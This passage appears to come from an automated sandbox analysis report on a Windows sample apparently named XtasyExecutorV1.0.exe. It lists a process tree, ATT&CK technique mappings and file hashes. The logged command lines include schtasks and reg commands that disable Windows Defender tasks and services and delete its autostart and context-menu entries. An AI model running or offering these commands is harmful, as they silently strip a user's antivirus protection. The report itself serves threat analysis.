      System Location Discovery: System Language Discovery
      PID:4264
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:1064
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3168
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2676
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:864
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1356
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:2724
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:1836
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:3064
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:2496
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      System Location Discovery: System Language Discovery
      PID:2948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6216 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e9a2c784e6d797d91d4b8612e14d51bd

SHA1
25e2b07c396ee82e4404af09424f747fc05f04c2

SHA256
18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

SHA512
fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1fc959921446fa3ab5813f75ca4d0235

SHA1
0aeef3ba7ba2aa1f725fca09432d384b06995e2a

SHA256
1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

SHA512
899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
e92b66f23e938337cba677eefa581cb9

SHA1
d034c7f3f22835635f7d579bc66ef9c97ae075c9

SHA256
fd5fd03ccba07283891506ff09c1f23cff64529d1194e1aef327bd95e145fe27

SHA512
7e3824f2bd8c9b02f9318abda5961f5e437d38c5c2a7e8e356ac6057a73f31b24482a7523935b2b6b6632dea0df7dcb184c0ffd09d3aa760a52cb9dc63ae6797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
391B

MD5
5c859d9288a60d235b3cad2c36ab5670

SHA1
e51cad875defee4028accce6de5bde1b6ca94dc6

SHA256
3f28f1593628cfb46518b9252683e3a8b0bfb921021be4c6ae413f114ccbb517

SHA512
24c6cc4268ceff420cc3026217c35566680a05e584498278e7c479a03cf55f8461135c607a849600a117e1d59719e7eb6e289087575689556d90ca0a9671ea8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8a92d6916ce4f23325849dfb674a68e1

SHA1
987c5c61f032e2d59d7428be3c2f16a3798caa6f

SHA256
9b7ecd1641d69e26465091613886977112137f2a7652d968d447e951f450b285

SHA512
1e2409faef47732a6ea3082b35cfb7044b7617f588f6fe4d18340238e368c81b2b1e0dafc7b109cf356280b94ce6b61199c8bcc9a3474deefc4220d7dfce07b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ba5402688388f4edef0cef17b6afe6b0

SHA1
c6f12fd3790e90bd3944783edb4c6d7458cb8087

SHA256
0a321f4924b8d12e3e13e56112b17a9161763770a6376700e3f63dbf3d8c9734

SHA512
6d3554dd25f70e1adc4df9087663e83f7bb14cca54feefb5dc3424b324cdc37219561226f66aca498745bf030d7a67855d379a0e18e3b93bc94e60adf9f7a4f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4bb0dda919a3b80a77821ca37d654c81

SHA1
dd4c6b97b929420bee4f816817605974cf2677b6

SHA256
cbbfe597fef724b7b4f670319f4d26f6782e209d34273405aea4b531ba0c9f58

SHA512
3bcd1cdd4d14dc85f36840259855b0c1ad040a6e2aa6d3baafa15c3529d4781e2e371370346ca4a3b88220ab0340e0c4e7c9c5b979801e94f4091d0ecec7efb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f08546daaa1b7809b4f483dfe13c7c32

SHA1
69596db84a01e5b6ea06910152a8c3e5a4250466

SHA256
b9cb989a5700e88c7ce9b66d05109ec36a9b04f2235d7d4e2966697d8ea90303

SHA512
efb79c14d3a790dd4ff980b9773299c411ec4d70e7c577e5cd6c01e3c5b908db1fb711bf361b293c47b8e5f40699f01720607874c96aa2477de39f2aa79f90bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\3eee8542.bat

Filesize
3KB

MD5
10e9d7377b7fd4df43145ae4c8b136b3

SHA1
4002ba143ff336f631d36c6afd93464822ba541e

SHA256
1b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1

SHA512
c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 469788.crdownload

Filesize
203KB

MD5
b8fb078ab0ff9ca107d79112a1a56255

SHA1
cebcb36d55bb63688bd9ffbf7d372ba41b0e959e

SHA256
2d73aa44284a435c2cc78b6a80a4326f42a28dfa598e5dfd20ba3f612afdcd37

SHA512
1a817eb1043122eb183821558cd9541f4a34f76551f52040f8c2e3caf8dd082a88d80799be868bbb84fdf339cb462a63bb14bceae869345485b565a19d01f1f9

Download Submit
C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe:Zone.Identifier

Filesize
164B

MD5
47156a9afc16ccda14dc240d70f281f0

SHA1
454e52cc45d9e1ee1e85378d9ef357ec2692ec02

SHA256
9cd7919c8db4ac3f6d7df6af05627289698b3c2364e1ae0d012eee9ba8800128

SHA512
ec34543c71df6de31f9b5f2380612476e77bafc2c0f6f8e77b3cf0ef9919dfc3942fa90f16ce7ca059eba3e31e21207f65de465ac11f2a633d3b7deca059cddc

Download Submit